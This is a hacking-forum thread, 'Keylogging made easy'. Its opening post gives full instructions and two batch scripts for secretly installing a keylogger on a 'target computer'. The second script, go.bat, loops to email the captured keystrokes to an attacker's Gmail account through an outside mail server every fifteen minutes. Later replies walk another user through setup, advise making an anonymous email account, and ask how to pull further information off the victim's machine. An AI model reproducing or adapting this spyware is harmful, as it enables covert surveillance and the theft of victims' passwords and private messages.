Hack Forums

Full Version: Keylogging made easy
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
You will need klogger from:

http://ntsecurity.nu/toolbox/klogger/

You will need a gmail account.

You will need blat from:

http://sourceforge.net/project/showfiles...p_id=81910

And Nircmd:

http://www.nirsoft.net/utils/nircmd.html



Ok put everything in a single directory on a flash drive, or a cd. Just a directory you can drag onto the target computer.

You should have blat.dll blat.exe blat.obj klogger and nircmd.

Ok now we are going to make two .bat files.

One is start.bat and the executable for the program:

nircmd.exe execmd CALL klogger
nircmd.exe execmd CALL go.bat

The next one is go.bat and you will need to do some editing to it.

goto THREE
:THREE
ping 127.0.0.1 -n 100 -w 1000> nul
REM the ping acts as a wait
Blat klogger.txt -to bsdpunk@gmail.com -u bsdpunk@gmail.com -p password -f
bsdpunk@gmail.com -server gsmtp183.google.com
REM Please don’t use my email address use your own and your own password etc.
goto THREE


You should now have blat.dll blat.exe blat.obj go.bat klogger nircmd and start.bat.

Just drag your folder with these files to the target computer and run start.bat.
Quote:goto THREE
:THREE
ping 127.0.0.1 -n 100 -w 1000> nul
REM the ping acts as a wait
Blat klogger.txt -to bsdpunk@gmail.com -u bsdpunk@gmail.com -p password -f
bsdpunk@gmail.com -server gsmtp183.google.com
REM Please don’t use my email address use your own and your own password etc.
goto THREE

why do i need to put in my password for my email?
also what do i put as the server instead of gsmtp183.google.com?
thanks
gsmtp183.google.com should be fine. Basically blat is logging into your gmail account to send your gmail account the klogger file. It's a little gross but you could write an extra bat file to delete the bat that has your pass and stuff in it.
alright awesome. i'm using an old email account so i don't really care. i'm gonna test it.
Carey Wrote:alright awesome. i'm using an old email account so i don't really care. i'm gonna test it.

Don't be stupid. Create a new account just for this.
seriously? idk if hat's sarcasm or not. but when do i get an email full of whatever that person typed or whatever?
Yeah you should probably go ahead and create a new account with no truthful information just to be on the safe side.
Cool looks pretty nice :P
alright, one last thing. let's say i got any info that i wanted. how do i get it off their comp? and when do i get the klogger email? thanks for all the help
The klogger email will email once about every 15 minutes you can increase that time by increasing the number after the -n. It will email you the entire key log each time.
Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
Reference URL's